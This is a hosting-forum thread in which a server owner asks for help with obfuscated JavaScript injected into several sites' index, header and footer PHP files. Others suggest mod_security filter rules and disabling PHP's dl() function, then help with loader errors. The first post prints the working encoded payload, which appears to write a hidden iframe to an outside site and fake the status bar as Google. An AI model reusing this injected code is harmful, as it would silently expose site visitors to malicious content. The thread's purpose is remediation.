Recurring PHP malicious document.write exploit

mousepotatoe

Active Member
Dec 17, 2003
36
0
156
On my server, several sites but not all sites are having this code inserted into php pages, mainly index.php header.php or footer.php

I cannot locate the source of this exploit.

Is anyone familiar with this? code follows

Code:
<script language=javascript>
document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%73%65%6C%66%2E%66%6F%63%75%73%28%29%3B%73%65%74%49%6E%74%65%72%76%61%6C%28%22%77%69%6E%64%6F%77%2E%73%74%61%74%75%73%3D%27%47%6F%6F%67%6C%65%2E%63%6F%6D%27%22%2C%37%29%3B%7D%3C%2F%73%63%72%69%70%74%3E%0D%0A'));dF('%286FLIUDPH%2853%2853vuf%286G%2855kwws%286D22zzz1vn%7Cv1frp2nlso1sks%2855%2853zlgwk%286G5%2853khljkw%286G5%2853vw%7Coh%286G%2855glvsod%7C%286Dqrqh%2855%286H%286F2LIUDPH%286H3')
</script>
any help would be greatly appreciated
 

DigitalN

Well-Known Member
Sep 23, 2004
419
1
168
Mod security will block the requests that you filter, but the real issue is probably that the mailicious php module is still being loaded via the dl() function.

Just edit your php.ini file and change

enable_dl = yes

to
enable_dl = no

And restart apache - the problem won't reoccur then.
 

mousepotatoe

Active Member
Dec 17, 2003
36
0
156
HostMerit said:
Id suggest mod_security, and my mod security ruleset that contains things to block such as this - http://www.hostmerit.com/modsec.user.conf


To block those with modsec,
SecFilter "document\.write"
SecFilterSelective THE_REQUEST "<script>"

My script contains around 30+ Javascript + XML cross site scripting code blocks.
Thats a wonderful mod_security ruleset, and thank you for writing the lines:

SecFilter "document\.write"
SecFilterSelective THE_REQUEST "<script>"

I have added this to my modsec ruleset, but the malicious code is creating
"<script language=javascript>"

would this mod_security recognize <script language=javascript> as <script> ?

Thanks!
 

mousepotatoe

Active Member
Dec 17, 2003
36
0
156
enable_dl = no blocks ioncube

DigitalN said:
Mod security will block the requests that you filter, but the real issue is probably that the mailicious php module is still being loaded via the dl() function.

Just edit your php.ini file and change

enable_dl = yes

to
enable_dl = no

And restart apache - the problem won't reoccur then.
If i change enable_dl = no all my ioncube sites go down, will not allow ioncube to load any of my ioncube encrypted sites. Is there a workaround for this?

Thank you!
 

Etheral

Well-Known Member
Dec 8, 2003
206
0
166
mousepotatoe said:
Thats a wonderful mod_security ruleset, and thank you for writing the lines:

SecFilter "document\.write"
SecFilterSelective THE_REQUEST "<script>"

I have added this to my modsec ruleset, but the malicious code is creating
"<script language=javascript>"

would this mod_security recognize <script language=javascript> as <script> ?

Thanks!

you might NOT want to block javascript like that, some people use javascript to give there website a more interactive feel...
 

HostMerit

Well-Known Member
Oct 24, 2004
163
0
166
New Jersey, USA
cPanel Access Level
DataCenter Provider
you might NOT want to block javascript like that, some people use javascript to give there website a more interactive feel...
You have no idea what you're talking about. I suggest you find out what mod_security is, and why the comment you made makes no sense. It blocks URL requests, not page code. :rolleyes: :rolleyes:
 

DigitalN

Well-Known Member
Sep 23, 2004
419
1
168
Yes,

enable_dl = Off

Is what you want - I was working from memory, it's as simple as that to disable this exploit.

Enabling dl() makes your server vulnerable to any account loading a rogue mdule into php - load ioncube and any other legitimate modules (such as sourceguardian) into php.ini yourself, as someone mentioned.
 

mousepotatoe

Active Member
Dec 17, 2003
36
0
156
Disabled dl() and cant run source guardian

Disabling the dl() function is wreaking havoc on many of my websites. I had to load ioncube into the php.ini and got past that, and have added source guardian to php.ini but am getting the following error.

One or more errors are fatal due to the fact that they disable the ability to load the Source Guardian loader:
Your system has the "dl()" function diabled.
This error is fatal and will prevent you from using this plugin. To access the rest of your plugins remove this plugin from your server.
I have tried

[Zend]
extension=/home/ixed/ixed.4.4.lin
zend_extension = /home/ioncube/ioncube_loader_lin_4.4.so
zend_optimizer.optimization_level=15
zend_extension_manager.optimizer=/usr/local/Zend/lib/Optimizer-2_6_2
zend_extension_manager.optimizer_ts=/usr/local/Zend/lib/Optimizer_TS-2_6_2
zend_optimizer.version=2.6.2
and
extension=/home/ixed/ixed.4.4.lin
[Zend]
zend_extension = /home/ioncube/ioncube_loader_lin_4.4.so
zend_optimizer.optimization_level=15
zend_extension_manager.optimizer=/usr/local/Zend/lib/Optimizer-2_6_2
zend_extension_manager.optimizer_ts=/usr/local/Zend/lib/Optimizer_TS-2_6_2
zend_optimizer.version=2.6.2
with no luck.
Any suggestions?

Thank you